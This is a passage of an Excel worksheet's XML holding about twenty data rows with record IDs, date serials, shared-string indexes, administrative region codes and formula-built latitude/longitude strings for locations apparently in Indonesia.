      <c r="O4080">
        <v>6210</v>
      </c>
      <c r="P4080">
        <v>62</v>
      </c>
      <c r="Q4080" t="s">
        <v>12761</v>
      </c>
      <c r="R4080" t="s">
        <v>12762</v>
      </c>
      <c r="S4080" t="s">
        <v>12763</v>
      </c>
      <c r="T4080" t="s">
        <v>7642</v>
      </c>
      <c r="U4080" s="5">
        <v>11395819902</v>
      </c>
      <c r="V4080" s="5" t="s">
        <v>18143</v>
      </c>
      <c r="W4080" s="5">
        <v>-214061236</v>
      </c>
      <c r="X4080" t="s">
        <v>21875</v>
      </c>
      <c r="Y4080" t="str">
        <f t="shared" si="63"/>
        <v>-2.14061236,113.95819902</v>
      </c>
    </row>
    <row r="4081" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4081">
        <v>298965</v>
      </c>
      <c r="B4081" s="1">
        <v>44507</v>
      </c>
      <c r="C4081" t="s">
        <v>13838</v>
      </c>
      <c r="D4081" t="s">
        <v>22</v>
      </c>
      <c r="E4081" t="s">
        <v>23</v>
      </c>
      <c r="F4081" t="s">
        <v>13839</v>
      </c>
      <c r="H4081" t="s">
        <v>26</v>
      </c>
      <c r="I4081" t="s">
        <v>1633</v>
      </c>
      <c r="J4081" t="s">
        <v>7436</v>
      </c>
      <c r="L4081" t="s">
        <v>7647</v>
      </c>
      <c r="M4081">
        <v>6105060015</v>
      </c>
      <c r="N4081">
        <v>6105060</v>
      </c>
      <c r="O4081">
        <v>6105</v>
      </c>
      <c r="P4081">
        <v>61</v>
      </c>
      <c r="Q4081" t="s">
        <v>13840</v>
      </c>
      <c r="R4081" t="s">
        <v>13841</v>
      </c>
      <c r="S4081" t="s">
        <v>8321</v>
      </c>
      <c r="T4081" t="s">
        <v>7441</v>
      </c>
      <c r="U4081" s="5">
        <v>11059338927</v>
      </c>
      <c r="V4081" s="5" t="s">
        <v>18144</v>
      </c>
      <c r="W4081" s="5">
        <v>12154689</v>
      </c>
      <c r="X4081" t="s">
        <v>21876</v>
      </c>
      <c r="Y4081" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.12154689,110.59338927</v>
      </c>
    </row>
    <row r="4082" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4082">
        <v>298926</v>
      </c>
      <c r="B4082" s="1">
        <v>44503</v>
      </c>
      <c r="C4082" t="s">
        <v>13842</v>
      </c>
      <c r="D4082" t="s">
        <v>22</v>
      </c>
      <c r="E4082" t="s">
        <v>23</v>
      </c>
      <c r="F4082" t="s">
        <v>13843</v>
      </c>
      <c r="G4082" t="s">
        <v>13844</v>
      </c>
      <c r="H4082" t="s">
        <v>26</v>
      </c>
      <c r="I4082" t="s">
        <v>6933</v>
      </c>
      <c r="J4082" t="s">
        <v>7436</v>
      </c>
      <c r="L4082" t="s">
        <v>13845</v>
      </c>
      <c r="M4082">
        <v>6105060015</v>
      </c>
      <c r="N4082">
        <v>6105060</v>
      </c>
      <c r="O4082">
        <v>6105</v>
      </c>
      <c r="P4082">
        <v>61</v>
      </c>
      <c r="Q4082" t="s">
        <v>13840</v>
      </c>
      <c r="R4082" t="s">
        <v>13841</v>
      </c>
      <c r="S4082" t="s">
        <v>8321</v>
      </c>
      <c r="T4082" t="s">
        <v>7441</v>
      </c>
      <c r="U4082" s="5">
        <v>11058892675</v>
      </c>
      <c r="V4082" s="5" t="s">
        <v>18145</v>
      </c>
      <c r="W4082" s="5">
        <v>11687459</v>
      </c>
      <c r="X4082" t="s">
        <v>21877</v>
      </c>
      <c r="Y4082" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.11687459,110.58892675</v>
      </c>
    </row>
    <row r="4083" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4083">
        <v>298989</v>
      </c>
      <c r="B4083" s="1">
        <v>44511</v>
      </c>
      <c r="C4083" t="s">
        <v>13846</v>
      </c>
      <c r="D4083" t="s">
        <v>22</v>
      </c>
      <c r="E4083" t="s">
        <v>23</v>
      </c>
      <c r="F4083" t="s">
        <v>13847</v>
      </c>
      <c r="G4083" t="s">
        <v>13848</v>
      </c>
      <c r="H4083" t="s">
        <v>26</v>
      </c>
      <c r="I4083" t="s">
        <v>193</v>
      </c>
      <c r="J4083" t="s">
        <v>7436</v>
      </c>
      <c r="M4083">
        <v>6105060014</v>
      </c>
      <c r="N4083">
        <v>6105060</v>
      </c>
      <c r="O4083">
        <v>6105</v>
      </c>
      <c r="P4083">
        <v>61</v>
      </c>
      <c r="Q4083" t="s">
        <v>13849</v>
      </c>
      <c r="R4083" t="s">
        <v>13841</v>
      </c>
      <c r="S4083" t="s">
        <v>8321</v>
      </c>
      <c r="T4083" t="s">
        <v>7441</v>
      </c>
      <c r="U4083" s="5">
        <v>11061223984</v>
      </c>
      <c r="V4083" s="5" t="s">
        <v>18146</v>
      </c>
      <c r="W4083" s="5">
        <v>12113920</v>
      </c>
      <c r="X4083" t="s">
        <v>21878</v>
      </c>
      <c r="Y4083" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.12113920,110.61223984</v>
      </c>
    </row>
    <row r="4084" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4084">
        <v>298927</v>
      </c>
      <c r="B4084" s="1">
        <v>44503</v>
      </c>
      <c r="C4084" t="s">
        <v>13850</v>
      </c>
      <c r="D4084" t="s">
        <v>22</v>
      </c>
      <c r="E4084" t="s">
        <v>23</v>
      </c>
      <c r="F4084" s="3" t="s">
        <v>13851</v>
      </c>
      <c r="G4084" t="s">
        <v>13852</v>
      </c>
      <c r="H4084" t="s">
        <v>26</v>
      </c>
      <c r="I4084" t="s">
        <v>9001</v>
      </c>
      <c r="J4084" t="s">
        <v>7436</v>
      </c>
      <c r="L4084" t="s">
        <v>13853</v>
      </c>
      <c r="M4084">
        <v>6109040002</v>
      </c>
      <c r="N4084">
        <v>6109040</v>
      </c>
      <c r="O4084">
        <v>6109</v>
      </c>
      <c r="P4084">
        <v>61</v>
      </c>
      <c r="Q4084" t="s">
        <v>13854</v>
      </c>
      <c r="R4084" t="s">
        <v>13855</v>
      </c>
      <c r="S4084" t="s">
        <v>13856</v>
      </c>
      <c r="T4084" t="s">
        <v>7441</v>
      </c>
      <c r="U4084" s="5">
        <v>11087571859</v>
      </c>
      <c r="V4084" s="5" t="s">
        <v>18147</v>
      </c>
      <c r="W4084" s="5">
        <v>1832485</v>
      </c>
      <c r="X4084" t="s">
        <v>21879</v>
      </c>
      <c r="Y4084" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> -0.01832485,110.87571859</v>
      </c>
    </row>
    <row r="4085" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4085">
        <v>298937</v>
      </c>
      <c r="B4085" s="1">
        <v>44505</v>
      </c>
      <c r="C4085" t="s">
        <v>13857</v>
      </c>
      <c r="D4085" t="s">
        <v>22</v>
      </c>
      <c r="E4085" t="s">
        <v>23</v>
      </c>
      <c r="F4085" t="s">
        <v>13858</v>
      </c>
      <c r="H4085" t="s">
        <v>26</v>
      </c>
      <c r="I4085" t="s">
        <v>3668</v>
      </c>
      <c r="J4085" t="s">
        <v>7436</v>
      </c>
      <c r="L4085" t="s">
        <v>13859</v>
      </c>
      <c r="M4085">
        <v>6109040002</v>
      </c>
      <c r="N4085">
        <v>6109040</v>
      </c>
      <c r="O4085">
        <v>6109</v>
      </c>
      <c r="P4085">
        <v>61</v>
      </c>
      <c r="Q4085" t="s">
        <v>13854</v>
      </c>
      <c r="R4085" t="s">
        <v>13855</v>
      </c>
      <c r="S4085" t="s">
        <v>13856</v>
      </c>
      <c r="T4085" t="s">
        <v>7441</v>
      </c>
      <c r="U4085" s="5">
        <v>11088252455</v>
      </c>
      <c r="V4085" s="5" t="s">
        <v>18148</v>
      </c>
      <c r="W4085" s="5">
        <v>2585673</v>
      </c>
      <c r="X4085" t="s">
        <v>21880</v>
      </c>
      <c r="Y4085" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> -0.02585673,110.88252455</v>
      </c>
    </row>
    <row r="4086" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4086">
        <v>299077</v>
      </c>
      <c r="B4086" s="1">
        <v>44524</v>
      </c>
      <c r="C4086" t="s">
        <v>13860</v>
      </c>
      <c r="D4086" t="s">
        <v>22</v>
      </c>
      <c r="E4086" t="s">
        <v>23</v>
      </c>
      <c r="F4086" t="s">
        <v>13861</v>
      </c>
      <c r="G4086" t="s">
        <v>13862</v>
      </c>
      <c r="H4086" t="s">
        <v>7086</v>
      </c>
      <c r="I4086" t="s">
        <v>7421</v>
      </c>
      <c r="J4086" t="s">
        <v>2608</v>
      </c>
      <c r="L4086" t="s">
        <v>13863</v>
      </c>
      <c r="M4086">
        <v>3322152009</v>
      </c>
      <c r="N4086">
        <v>3322152</v>
      </c>
      <c r="O4086">
        <v>3322</v>
      </c>
      <c r="P4086">
        <v>33</v>
      </c>
      <c r="Q4086" t="s">
        <v>12216</v>
      </c>
      <c r="R4086" t="s">
        <v>13864</v>
      </c>
      <c r="S4086" t="s">
        <v>1334</v>
      </c>
      <c r="T4086" t="s">
        <v>1134</v>
      </c>
      <c r="U4086" s="5">
        <v>11040478706</v>
      </c>
      <c r="V4086" s="5" t="s">
        <v>18149</v>
      </c>
      <c r="W4086" s="5">
        <v>-713826052</v>
      </c>
      <c r="X4086" t="s">
        <v>21881</v>
      </c>
      <c r="Y4086" t="str">
        <f t="shared" si="63"/>
        <v>-7.13826052,110.40478706</v>
      </c>
    </row>
    <row r="4087" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4087">
        <v>299045</v>
      </c>
      <c r="B4087" s="1">
        <v>44523</v>
      </c>
      <c r="C4087" t="s">
        <v>13865</v>
      </c>
      <c r="D4087" t="s">
        <v>22</v>
      </c>
      <c r="E4087" t="s">
        <v>23</v>
      </c>
      <c r="F4087" t="s">
        <v>13866</v>
      </c>
      <c r="G4087" t="s">
        <v>13867</v>
      </c>
      <c r="H4087" t="s">
        <v>26</v>
      </c>
      <c r="I4087" t="s">
        <v>137</v>
      </c>
      <c r="J4087" t="s">
        <v>2622</v>
      </c>
      <c r="L4087" t="s">
        <v>13868</v>
      </c>
      <c r="M4087">
        <v>3515140002</v>
      </c>
      <c r="N4087">
        <v>3515140</v>
      </c>
      <c r="O4087">
        <v>3515</v>
      </c>
      <c r="P4087">
        <v>35</v>
      </c>
      <c r="Q4087" t="s">
        <v>7233</v>
      </c>
      <c r="R4087" t="s">
        <v>1927</v>
      </c>
      <c r="S4087" t="s">
        <v>1928</v>
      </c>
      <c r="T4087" t="s">
        <v>1221</v>
      </c>
      <c r="U4087" s="5">
        <v>11272634520</v>
      </c>
      <c r="V4087" s="5" t="s">
        <v>18150</v>
      </c>
      <c r="W4087" s="5">
        <v>-736509430</v>
      </c>
      <c r="X4087" t="s">
        <v>21882</v>
      </c>
      <c r="Y4087" t="str">
        <f t="shared" si="63"/>
        <v>-7.36509430,112.72634520</v>
      </c>
    </row>
    <row r="4088" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4088">
        <v>298943</v>
      </c>
      <c r="B4088" s="1">
        <v>44506</v>
      </c>
      <c r="C4088" t="s">
        <v>13869</v>
      </c>
      <c r="D4088" t="s">
        <v>22</v>
      </c>
      <c r="E4088" t="s">
        <v>23</v>
      </c>
      <c r="F4088" t="s">
        <v>13870</v>
      </c>
      <c r="G4088" t="s">
        <v>13871</v>
      </c>
      <c r="H4088" t="s">
        <v>26</v>
      </c>
      <c r="I4088" t="s">
        <v>13872</v>
      </c>
      <c r="J4088" t="s">
        <v>7436</v>
      </c>
      <c r="L4088" t="s">
        <v>13873</v>
      </c>
      <c r="M4088">
        <v>6107140005</v>
      </c>
      <c r="N4088">
        <v>6107140</v>
      </c>
      <c r="O4088">
        <v>6107</v>
      </c>
      <c r="P4088">
        <v>61</v>
      </c>
      <c r="Q4088" t="s">
        <v>13874</v>
      </c>
      <c r="R4088" t="s">
        <v>13411</v>
      </c>
      <c r="S4088" t="s">
        <v>13411</v>
      </c>
      <c r="T4088" t="s">
        <v>7441</v>
      </c>
      <c r="U4088" s="5">
        <v>11148960114</v>
      </c>
      <c r="V4088" s="5" t="s">
        <v>18151</v>
      </c>
      <c r="W4088" s="5">
        <v>6694792</v>
      </c>
      <c r="X4088" t="s">
        <v>21883</v>
      </c>
      <c r="Y4088" t="str">
        <f t="shared" si="63"/>
        <v>0.06694792,111.48960114</v>
      </c>
    </row>
    <row r="4089" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4089">
        <v>298944</v>
      </c>
      <c r="B4089" s="1">
        <v>44506</v>
      </c>
      <c r="C4089" t="s">
        <v>13875</v>
      </c>
      <c r="D4089" t="s">
        <v>22</v>
      </c>
      <c r="E4089" t="s">
        <v>23</v>
      </c>
      <c r="F4089" t="s">
        <v>13876</v>
      </c>
      <c r="G4089" t="s">
        <v>13877</v>
      </c>
      <c r="H4089" t="s">
        <v>26</v>
      </c>
      <c r="I4089" t="s">
        <v>277</v>
      </c>
      <c r="J4089" t="s">
        <v>7436</v>
      </c>
      <c r="L4089" t="s">
        <v>13878</v>
      </c>
      <c r="M4089">
        <v>6107140005</v>
      </c>
      <c r="N4089">
        <v>6107140</v>
      </c>
      <c r="O4089">
        <v>6107</v>
      </c>
      <c r="P4089">
        <v>61</v>
      </c>
      <c r="Q4089" t="s">
        <v>13874</v>
      </c>
      <c r="R4089" t="s">
        <v>13411</v>
      </c>
      <c r="S4089" t="s">
        <v>13411</v>
      </c>
      <c r="T4089" t="s">
        <v>7441</v>
      </c>
      <c r="U4089" s="5">
        <v>11148758796</v>
      </c>
      <c r="V4089" s="5" t="s">
        <v>18152</v>
      </c>
      <c r="W4089" s="5">
        <v>6845683</v>
      </c>
      <c r="X4089" t="s">
        <v>21884</v>
      </c>
      <c r="Y4089" t="str">
        <f t="shared" si="63"/>
        <v>0.06845683,111.48758796</v>
      </c>
    </row>
    <row r="4090" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4090">
        <v>298930</v>
      </c>
      <c r="B4090" s="1">
        <v>44504</v>
      </c>
      <c r="C4090" t="s">
        <v>13879</v>
      </c>
      <c r="D4090" t="s">
        <v>22</v>
      </c>
      <c r="E4090" t="s">
        <v>23</v>
      </c>
      <c r="F4090" t="s">
        <v>13880</v>
      </c>
      <c r="G4090" t="s">
        <v>13881</v>
      </c>
      <c r="H4090" t="s">
        <v>26</v>
      </c>
      <c r="I4090" t="s">
        <v>8605</v>
      </c>
      <c r="J4090" t="s">
        <v>7436</v>
      </c>
      <c r="L4090" t="s">
        <v>13882</v>
      </c>
      <c r="M4090">
        <v>6107180005</v>
      </c>
      <c r="N4090">
        <v>6107180</v>
      </c>
      <c r="O4090">
        <v>6107</v>
      </c>
      <c r="P4090">
        <v>61</v>
      </c>
      <c r="Q4090" t="s">
        <v>13409</v>
      </c>
      <c r="R4090" t="s">
        <v>13410</v>
      </c>
      <c r="S4090" t="s">
        <v>13411</v>
      </c>
      <c r="T4090" t="s">
        <v>7441</v>
      </c>
      <c r="U4090" s="5">
        <v>11155981064</v>
      </c>
      <c r="V4090" s="5" t="s">
        <v>18153</v>
      </c>
      <c r="W4090" s="5">
        <v>19269490</v>
      </c>
      <c r="X4090" t="s">
        <v>21885</v>
      </c>
      <c r="Y4090" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.19269490,111.55981064</v>
      </c>
    </row>
    <row r="4091" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4091">
        <v>298940</v>
      </c>
      <c r="B4091" s="1">
        <v>44505</v>
      </c>
      <c r="C4091" t="s">
        <v>13883</v>
      </c>
      <c r="D4091" t="s">
        <v>22</v>
      </c>
      <c r="E4091" t="s">
        <v>23</v>
      </c>
      <c r="F4091" t="s">
        <v>13884</v>
      </c>
      <c r="G4091" t="s">
        <v>13885</v>
      </c>
      <c r="H4091" t="s">
        <v>26</v>
      </c>
      <c r="I4091" t="s">
        <v>555</v>
      </c>
      <c r="J4091" t="s">
        <v>7436</v>
      </c>
      <c r="L4091" t="s">
        <v>13886</v>
      </c>
      <c r="M4091">
        <v>6107180005</v>
      </c>
      <c r="N4091">
        <v>6107180</v>
      </c>
      <c r="O4091">
        <v>6107</v>
      </c>
      <c r="P4091">
        <v>61</v>
      </c>
      <c r="Q4091" t="s">
        <v>13409</v>
      </c>
      <c r="R4091" t="s">
        <v>13410</v>
      </c>
      <c r="S4091" t="s">
        <v>13411</v>
      </c>
      <c r="T4091" t="s">
        <v>7441</v>
      </c>
      <c r="U4091" s="5">
        <v>11155981600</v>
      </c>
      <c r="V4091" s="5" t="s">
        <v>18154</v>
      </c>
      <c r="W4091" s="5">
        <v>19270026</v>
      </c>
      <c r="X4091" t="s">
        <v>21886</v>
      </c>
      <c r="Y4091" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.19270026,111.55981600</v>
      </c>
    </row>
    <row r="4092" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4092">
        <v>298974</v>
      </c>
      <c r="B4092" s="1">
        <v>44508</v>
      </c>
      <c r="C4092" t="s">
        <v>13887</v>
      </c>
      <c r="D4092" t="s">
        <v>22</v>
      </c>
      <c r="E4092" t="s">
        <v>23</v>
      </c>
      <c r="F4092" t="s">
        <v>13888</v>
      </c>
      <c r="G4092" t="s">
        <v>13889</v>
      </c>
      <c r="H4092" t="s">
        <v>26</v>
      </c>
      <c r="I4092" t="s">
        <v>1080</v>
      </c>
      <c r="J4092" t="s">
        <v>7436</v>
      </c>
      <c r="L4092" t="s">
        <v>13890</v>
      </c>
      <c r="M4092">
        <v>6107140003</v>
      </c>
      <c r="N4092">
        <v>6107140</v>
      </c>
      <c r="O4092">
        <v>6107</v>
      </c>
      <c r="P4092">
        <v>61</v>
      </c>
      <c r="Q4092" t="s">
        <v>13891</v>
      </c>
      <c r="R4092" t="s">
        <v>13411</v>
      </c>
      <c r="S4092" t="s">
        <v>13411</v>
      </c>
      <c r="T4092" t="s">
        <v>7441</v>
      </c>
      <c r="U4092" s="5">
        <v>11149688601</v>
      </c>
      <c r="V4092" s="5" t="s">
        <v>18155</v>
      </c>
      <c r="W4092" s="5">
        <v>6980229</v>
      </c>
      <c r="X4092" t="s">
        <v>21887</v>
      </c>
      <c r="Y4092" t="str">
        <f t="shared" si="63"/>
        <v>0.06980229,111.49688601</v>
      </c>
    </row>
    <row r="4093" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4093">
        <v>298933</v>
      </c>
      <c r="B4093" s="1">
        <v>44504</v>
      </c>
      <c r="C4093" t="s">
        <v>13892</v>
      </c>
      <c r="D4093" t="s">
        <v>22</v>
      </c>
      <c r="E4093" t="s">
        <v>23</v>
      </c>
      <c r="F4093" t="s">
        <v>13893</v>
      </c>
      <c r="G4093" t="s">
        <v>13894</v>
      </c>
      <c r="H4093" t="s">
        <v>26</v>
      </c>
      <c r="I4093" t="s">
        <v>137</v>
      </c>
      <c r="J4093" t="s">
        <v>7436</v>
      </c>
      <c r="L4093" t="s">
        <v>13895</v>
      </c>
      <c r="M4093">
        <v>6107180005</v>
      </c>
      <c r="N4093">
        <v>6107180</v>
      </c>
      <c r="O4093">
        <v>6107</v>
      </c>
      <c r="P4093">
        <v>61</v>
      </c>
      <c r="Q4093" t="s">
        <v>13409</v>
      </c>
      <c r="R4093" t="s">
        <v>13410</v>
      </c>
      <c r="S4093" t="s">
        <v>13411</v>
      </c>
      <c r="T4093" t="s">
        <v>7441</v>
      </c>
      <c r="U4093" s="5">
        <v>11155980527</v>
      </c>
      <c r="V4093" s="5" t="s">
        <v>18156</v>
      </c>
      <c r="W4093" s="5">
        <v>19270563</v>
      </c>
      <c r="X4093" t="s">
        <v>21888</v>
      </c>
      <c r="Y4093" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.19270563,111.55980527</v>
      </c>
    </row>
    <row r="4094" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4094">
        <v>298984</v>
      </c>
      <c r="B4094" s="1">
        <v>44509</v>
      </c>
      <c r="C4094" t="s">
        <v>13896</v>
      </c>
      <c r="D4094" t="s">
        <v>22</v>
      </c>
      <c r="E4094" t="s">
        <v>23</v>
      </c>
      <c r="F4094" t="s">
        <v>13897</v>
      </c>
      <c r="G4094" t="s">
        <v>13898</v>
      </c>
      <c r="H4094" t="s">
        <v>26</v>
      </c>
      <c r="I4094" t="s">
        <v>443</v>
      </c>
      <c r="J4094" t="s">
        <v>7436</v>
      </c>
      <c r="L4094" t="s">
        <v>13899</v>
      </c>
      <c r="M4094">
        <v>6107140005</v>
      </c>
      <c r="N4094">
        <v>6107140</v>
      </c>
      <c r="O4094">
        <v>6107</v>
      </c>
      <c r="P4094">
        <v>61</v>
      </c>
      <c r="Q4094" t="s">
        <v>13874</v>
      </c>
      <c r="R4094" t="s">
        <v>13411</v>
      </c>
      <c r="S4094" t="s">
        <v>13411</v>
      </c>
      <c r="T4094" t="s">
        <v>7441</v>
      </c>
      <c r="U4094" s="5">
        <v>11148971915</v>
      </c>
      <c r="V4094" s="5" t="s">
        <v>18157</v>
      </c>
      <c r="W4094" s="5">
        <v>6478070</v>
      </c>
      <c r="X4094" t="s">
        <v>21889</v>
      </c>
      <c r="Y4094" t="str">
        <f t="shared" si="63"/>
        <v>64.78070,111.48971915</v>
      </c>
    </row>
    <row r="4095" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4095">
        <v>298972</v>
      </c>
      <c r="B4095" s="1">
        <v>44507</v>
      </c>
      <c r="C4095" t="s">
        <v>13900</v>
      </c>
      <c r="D4095" t="s">
        <v>22</v>
      </c>
      <c r="E4095" t="s">
        <v>23</v>
      </c>
      <c r="F4095" t="s">
        <v>13901</v>
      </c>
      <c r="G4095" t="s">
        <v>13902</v>
      </c>
      <c r="H4095" t="s">
        <v>26</v>
      </c>
      <c r="I4095" t="s">
        <v>1651</v>
      </c>
      <c r="J4095" t="s">
        <v>7436</v>
      </c>
      <c r="L4095" t="s">
        <v>13903</v>
      </c>
      <c r="M4095">
        <v>6107140005</v>
      </c>
      <c r="N4095">
        <v>6107140</v>
      </c>
      <c r="O4095">
        <v>6107</v>
      </c>
      <c r="P4095">
        <v>61</v>
      </c>
      <c r="Q4095" t="s">
        <v>13874</v>
      </c>
      <c r="R4095" t="s">
        <v>13411</v>
      </c>
      <c r="S4095" t="s">
        <v>13411</v>
      </c>
      <c r="T4095" t="s">
        <v>7441</v>
      </c>
      <c r="U4095" s="5">
        <v>11148675137</v>
      </c>
      <c r="V4095" s="5" t="s">
        <v>18158</v>
      </c>
      <c r="W4095" s="5">
        <v>6345422</v>
      </c>
      <c r="X4095" t="s">
        <v>21890</v>
      </c>
      <c r="Y4095" t="str">
        <f t="shared" si="63"/>
        <v>63.45422,111.48675137</v>
      </c>
    </row>
    <row r="4096" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4096">
        <v>298945</v>
      </c>
      <c r="B4096" s="1">
        <v>44506</v>
      </c>
      <c r="C4096" t="s">
        <v>13904</v>
      </c>
      <c r="D4096" t="s">
        <v>22</v>
      </c>
      <c r="E4096" t="s">
        <v>23</v>
      </c>
      <c r="F4096" t="s">
        <v>13905</v>
      </c>
      <c r="G4096" t="s">
        <v>13906</v>
      </c>
      <c r="H4096" t="s">
        <v>26</v>
      </c>
      <c r="I4096" t="s">
        <v>3981</v>
      </c>
      <c r="J4096" t="s">
        <v>7436</v>
      </c>
      <c r="L4096" t="s">
        <v>13907</v>
      </c>
      <c r="M4096">
        <v>6107140003</v>
      </c>
      <c r="N4096">
        <v>6107140</v>
      </c>
      <c r="O4096">
        <v>6107</v>
      </c>
      <c r="P4096">
        <v>61</v>
      </c>
      <c r="Q4096" t="s">
        <v>13891</v>
      </c>
      <c r="R4096" t="s">
        <v>13411</v>
      </c>
      <c r="S4096" t="s">
        <v>13411</v>
      </c>
      <c r="T4096" t="s">
        <v>7441</v>
      </c>
      <c r="U4096" s="5">
        <v>11150295391</v>
      </c>
      <c r="V4096" s="5" t="s">
        <v>18159</v>
      </c>
      <c r="W4096" s="5">
        <v>7456035</v>
      </c>
      <c r="X4096" t="s">
        <v>21891</v>
      </c>
      <c r="Y4096" t="str">
        <f t="shared" si="63"/>
        <v>74.56035,111.50295391</v>
      </c>
    </row>
    <row r="4097" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4097">
        <v>299004</v>
      </c>
      <c r="B4097" s="1">
        <v>44512</v>
      </c>
      <c r="C4097" t="s">
        <v>13908</v>
      </c>
      <c r="D4097" t="s">
        <v>22</v>
      </c>
      <c r="E4097" t="s">
        <v>23</v>
      </c>
      <c r="F4097" t="s">
        <v>13909</v>
      </c>
      <c r="G4097" t="s">
        <v>13910</v>
      </c>
      <c r="H4097" t="s">
        <v>26</v>
      </c>
      <c r="I4097" t="s">
        <v>517</v>
      </c>
      <c r="J4097" t="s">
        <v>7436</v>
      </c>
      <c r="M4097">
        <v>6107180005</v>
      </c>
      <c r="N4097">
        <v>6107180</v>
      </c>
      <c r="O4097">
        <v>6107</v>
      </c>
      <c r="P4097">
        <v>61</v>
      </c>
      <c r="Q4097" t="s">
        <v>13409</v>
      </c>
      <c r="R4097" t="s">
        <v>13410</v>
      </c>
      <c r="S4097" t="s">
        <v>13411</v>
      </c>
      <c r="T4097" t="s">
        <v>7441</v>
      </c>
      <c r="U4097" s="5">
        <v>11155980527</v>
      </c>
      <c r="V4097" s="5" t="s">
        <v>18156</v>
      </c>
      <c r="W4097" s="5">
        <v>19324743</v>
      </c>
      <c r="X4097" t="s">
        <v>21892</v>
      </c>
      <c r="Y4097" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.19324743,111.55980527</v>
      </c>
    </row>
    <row r="4098" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4098">
        <v>299003</v>
      </c>
      <c r="B4098" s="1">
        <v>44512</v>
      </c>
      <c r="C4098" t="s">
        <v>13911</v>
      </c>
      <c r="D4098" t="s">
        <v>22</v>
      </c>
      <c r="E4098" t="s">
        <v>23</v>
      </c>
      <c r="F4098" t="s">
        <v>13912</v>
      </c>
      <c r="G4098" t="s">
        <v>13913</v>
      </c>
      <c r="H4098" t="s">
        <v>26</v>
      </c>
      <c r="I4098" t="s">
        <v>373</v>
      </c>
      <c r="J4098" t="s">
        <v>7436</v>
      </c>
      <c r="M4098">
        <v>6107180005</v>
      </c>
      <c r="N4098">
        <v>6107180</v>
      </c>
      <c r="O4098">
        <v>6107</v>
      </c>
      <c r="P4098">
        <v>61</v>
      </c>
      <c r="Q4098" t="s">
        <v>13409</v>
      </c>
      <c r="R4098" t="s">
        <v>13410</v>
      </c>
      <c r="S4098" t="s">
        <v>13411</v>
      </c>
      <c r="T4098" t="s">
        <v>7441</v>
      </c>
      <c r="U4098" s="5">
        <v>11155981064</v>
      </c>
      <c r="V4098" s="5" t="s">
        <v>18153</v>
      </c>
      <c r="W4098" s="5">
        <v>19269490</v>
      </c>
      <c r="X4098" t="s">
        <v>21885</v>
      </c>
      <c r="Y4098" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.19269490,111.55981064</v>
      </c>
    </row>
    <row r="4099" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4099">
        <v>299110</v>
      </c>
      <c r="B4099" s="1">
        <v>44527</v>
      </c>
      <c r="C4099" t="s">
        <v>13914</v>
      </c>
      <c r="D4099" t="s">
        <v>22</v>
      </c>
      <c r="E4099" t="s">
        <v>23</v>
      </c>
      <c r="F4099" s="3" t="s">
        <v>13915</v>
      </c>
      <c r="H4099" t="s">
        <v>26</v>
      </c>
      <c r="I4099" t="s">
        <v>2196</v>
      </c>
      <c r="J4099" t="s">
        <v>7509</v>
      </c>
      <c r="L4099" t="s">
        <v>13916</v>
      </c>
      <c r="M4099">
        <v>1372020002</v>
      </c>
      <c r="N4099">
        <v>1372020</v>
      </c>
      <c r="O4099">
        <v>1372</v>
      </c>
      <c r="P4099">
        <v>13</v>
      </c>
      <c r="Q4099" t="s">
        <v>13917</v>
      </c>
      <c r="R4099" t="s">
        <v>13918</v>
      </c>
      <c r="S4099" t="s">
        <v>8738</v>
      </c>
      <c r="T4099" t="s">
        <v>7514</v>
      </c>
      <c r="U4099" s="5">
        <v>10065733373</v>
      </c>
      <c r="V4099" s="5" t="s">
        <v>18160</v>
      </c>
      <c r="W4099" s="5">
        <v>-79221883</v>
      </c>
      <c r="X4099" t="s">
        <v>21893</v>
      </c>
      <c r="Y4099" t="str">
        <f t="shared" ref="Y4099:Y4162" si="64">CONCATENATE(X4099,",",V4099)</f>
        <v xml:space="preserve"> -0.79221883,100.65733373</v>
      </c>
    </row>
    <row r="4100" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4100">
        <v>299079</v>
      </c>
      <c r="B4100" s="1">
        <v>44524</v>
      </c>
      <c r="C4100" t="s">
        <v>13919</v>
      </c>
      <c r="D4100" t="s">
        <v>22</v>
      </c>
      <c r="E4100" t="s">
        <v>23</v>
      </c>
      <c r="F4100" t="s">
        <v>13920</v>
      </c>
      <c r="G4100" t="s">
        <v>13921</v>
      </c>
      <c r="H4100" t="s">
        <v>26</v>
      </c>
      <c r="I4100" t="s">
        <v>1559</v>
      </c>
      <c r="J4100" t="s">
        <v>2622</v>
      </c>
      <c r="L4100" t="s">
        <v>13922</v>
      </c>
      <c r="M4100">
        <v>3578280006</v>
      </c>
      <c r="N4100">
        <v>3578280</v>
      </c>
      <c r="O4100">
        <v>3578</v>
      </c>
      <c r="P4100">
        <v>35</v>
      </c>
      <c r="Q4100" t="s">
        <v>6388</v>
      </c>
      <c r="R4100" t="s">
        <v>6389</v>
      </c>
      <c r="S4100" t="s">
        <v>1346</v>
      </c>
